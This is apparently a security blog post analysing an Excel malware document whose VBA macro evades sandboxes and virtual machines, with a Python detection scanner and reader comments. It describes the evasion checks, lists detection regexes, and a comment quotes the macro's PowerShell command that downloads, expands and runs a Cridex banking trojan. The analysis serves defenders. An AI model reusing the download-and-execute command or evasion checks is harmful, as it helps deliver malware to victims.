Today I got an interesting maldoc sample (77f3949c2130b268bb18061bcb483d16): it will not activate if it runs in a sandboxed or virtualized environment.
The following statements are executed right before the malicious actions begin:
If IsSandBoxiePresent(1) = True Then End
If IsAnubisPresent(1) = True Then End
If IsVirtualPCPresent = True Then End
The presence of SandBoxie can be detected by the successful load of the DLL Sbiedll.dll or by the presence of the string [#] in the window title. In this sample, the DLL is checked (argument 1).
The presence of Anubis can be detected by checking the serial number of the system drive, checking the Windows Product ID, or checking the name of the application or the user. In this sample, the serial number is checked (argument 1).
The presence of virtualization is detected by enumerating the services\disk registry key and looking for the strings “virual”, “vmware” or “vbox”.
With the help of Google, I discovered that the criminals copy/pasted 7-year-old code posted on a forum here, here and here. It’s in Spanish, while the Excel document has code page 1251 ANSI Cyrillic.
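For triage, the checks described above can be turned into static indicators that a script matches against extracted VBA source. The following scanner is an added example, not the maldoc’s code; the indicator names, the regular expressions and the sample macro text are constructed for illustration.

```python
import re

# Indicators of the anti-analysis checks described in the post (hypothetical
# scanner, not the maldoc's own code): (category, regex) over VBA source text.
EVASION_INDICATORS = [
    ("sandboxie_dll", r"sbiedll\.dll"),                      # LoadLibrary check
    ("sandboxie_title", r"\[#\]"),                           # window title marker
    ("anubis_serial", r"GetVolumeInformation|VolumeSerialNumber"),
    ("anubis_productid", r"ProductId"),
    ("vm_disk_enum", r"services\\disk"),                     # disk enumeration key
    ("vm_vendor_string", r'"(vmware|vbox|virtual)"'),        # quoted vendor strings
    ("evasion_helper", r"Is(SandBoxie|Anubis|VirtualPC)Present"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in EVASION_INDICATORS]

def scan_vba(source: str) -> dict:
    """Return {indicator: [line numbers]} for every indicator found in the source."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, rx in COMPILED:
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def evasion_score(hits: dict) -> int:
    """Number of distinct indicator categories; two or more is worth a closer look."""
    return len(hits)

# Constructed sample mimicking the post's checks (not the real macro).
SAMPLE_VBA = """\
Private Function IsSandBoxiePresent(m As Integer) As Boolean
    IsSandBoxiePresent = (LoadLibrary("SbieDll.dll") <> 0)
End Function
Private Function IsVirtualPCPresent() As Boolean
    Dim k As String
    k = "SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum"
    If InStr(LCase(RegRead(k)), "vmware") > 0 Then IsVirtualPCPresent = True
    If InStr(LCase(RegRead(k)), "vbox") > 0 Then IsVirtualPCPresent = True
End Function
Sub AutoOpen()
    If IsSandBoxiePresent(1) = True Then End
    If IsVirtualPCPresent = True Then End
End Sub
"""

if __name__ == "__main__":
    found = scan_vba(SAMPLE_VBA)
    for name, lines in sorted(found.items()):
        print(f"{name}: lines {lines}")
    print("evasion categories:", evasion_score(found))
```

Feed it the VBA streams extracted from a document (for example with oledump’s decompression output) and treat a score of two or more as a reason to detonate the sample outside a stock sandbox.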
Soo…. we should surf from a VM pc.
Comment by Johann Wilkerson — Wednesday 11 March 2015 @ 21:11
Or… we should make our estate look like virtuals… until they start trashing virtuals to try to upset the researchers of course 😉
Comment by Chris — Thursday 12 March 2015 @ 13:03
The VBA macro performs the PowerShell with the following command:
"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://*.*.*.*/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;"
Comment by RobbyFux — Thursday 12 March 2015 @ 22:04
hxxp://*.*.*.*/asdvx/fghs.php downloads the Cridex banking trojan
Comment by RobbyFux — Thursday 12 March 2015 @ 22:10
sha256 37730a644aed8c76d8cc55bd2740c37d3ec488d3fa9b7c29aec4b52c160f0322
Comment by RobbyFux — Thursday 12 March 2015 @ 22:10